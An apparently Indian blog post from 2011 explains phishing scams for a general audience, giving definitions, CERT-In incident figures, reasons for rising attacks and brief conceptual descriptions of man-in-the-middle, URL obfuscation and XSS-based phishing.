Tuesday, March 29, 2011

Phishing scams in India and legal provisions

phishing, noun, the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers, online.

SUPPOSE, ONE day you open your email, and find a weird looking mail from your bank, beware, it could be something phishy! A message in your inbox from your bank with which you have an internet enabled account asking to update your account with your personal information, login detail, etc., on the pretext of upgradation of server of the bank, should not be opened. You would also see a link, by clicking on which you would be linked to a look alike website of your bank, which looks quite authentic and convincing. However, you may be smart enough to know that this is a trap by a con to get your vital personal information to make fraudulent financial transactions and swindle your money. But there are many others who are not as smart as you, and fall into the trap and pass on their vital login details and lose their valuable money.

Phishing is an internet-age crime, born out of the technological advances in internet age. “Phishing" is a newer form of social engineering. Typically, Phishing is a form of social engineering, characterised by attempts to fraudulently acquire sensitive information, such as passwords, usernames, login IDs, ATM PINs and credit card details, by masquerading as a trustworthy person or business in an apparently official electronic communication, such as an email or an instant message.

The phishing attacks will then direct the recipient to a web page (mirror webpage) so exactly designed to look as a impersonated organization’s (often bank & financial institution) own website and then they cleverly harvest the user's personal information, often leaving the victim unaware of the attack.Phishing has become so rampant that even the Oxford English Dictionary added “Phishing” to its latest publication making it a definitive word of English Language.

It defines “Phishing” as:

As per the American Banker’s Association “Phishing attacks use 'spoofed' e-mails and fraudulent Web sites designed to fool recipients into divulging personal financial data such as credit card numbers, account usernames and passwords, Social Security numbers, etc. By hijacking the trusted brands of well-known banks, online retailers and credit card companies, phishers are able to convince up to 5 percent of recipients to respond to them.”

The Anti-Phishing Working Group (APWG), which is an industry association focused on eliminating identity theft and fraud from the growing problem of phishing and email spoofing defines Phishing as a form of online identity theft that employs both social engineering and technical subterfuge to steal consumers' personal identity data and financial account credentials. According to the Annual Report of the Indian Computer Emergency Response Team (CERT-In), Deptt. of Information Technology, Ministry of Communications & Information Technology, (Govt. of India) in the year 2009, the CERT-In handled about 374 phishing incidents.

Major factors for increase in Phishing Attacks:

There are three major factors behind the recent spurt in phishing attacks worldwide particularly in India: Lack of awareness among public: Worldwide, particularly in India, there has been lack of awareness regarding the phishing attacks among the common masses. The users are unaware that their personal information is actively being targeted by criminals and they do not take proper precautions when they conduct online activities.Lack of awareness about policy – The fraudsters often count on victim’s unawareness of Bank/financial institution policies and procedures for contacting customers, particularly for issues relating to account maintenance and fraud investigation. Customers unaware of the policies of an online transaction are likely to be more susceptible to the social engineering aspect of a phishing scam, regardless of technical sophistication.Technical sophistication – Fraudsters are now using advanced technology that has been successfully used for activities such as spam, distributed denial of service (DDoS), and electronic surveillance. Even as customers are becoming aware of phishing, criminals are developing techniques to counter this awareness. These techniques include URL obfuscation to make phishing emails and web sites appear more legitimate, and exploitation of vulnerabilities in web browsers that allow the download and execution of malicious code from a hostile web site.

Techniques of Phishing attacks Man-in-the-middle attacks: In this class of attack, the attacker sits between the customer and the real web-based application, and proxies all communications between the systems. This form of attack is successful for both HTTP and HTTPS communications. The customer connects to the attackers server as if it was the real site, while the attackers server makes a simultaneous connection to the real site. The attackers server then proxies all communications between the customer and the real web-based application server – typically in real-time.

URL Obfuscation Attacks: Using URL obfuscation techniques which involves minor changes to the URL, the fraudster tricks the user to follow a hyperlink (URL) to the attacker's server, without the users realizing that he has been duped. URL Obfuscation uses the unspoken, unwritten secrets of the TCP/IP protocol to trick users into viewing a website that they did not intend to visit.

XSS (Cross-site Scripting): Cross-site scripting attacks (XSS) make use of custom URL or code injection into a valid web-based application URL or imbedded data field. In general, these XSS techniques are the result of failure of a site to validate user input before returning it to the client’s web-browser.

Phishing scenario in XSS:

•Victim logs into a web site

•Attacker has spread “mines” using an XSS vulnerability

•Victim fall upon an XSS mine

•Victim gets a message saying that their session has terminated, and they have to to authenticate again

•Victim’s username and password are send to attacker

(To be continued)

No comments:

Post a Comment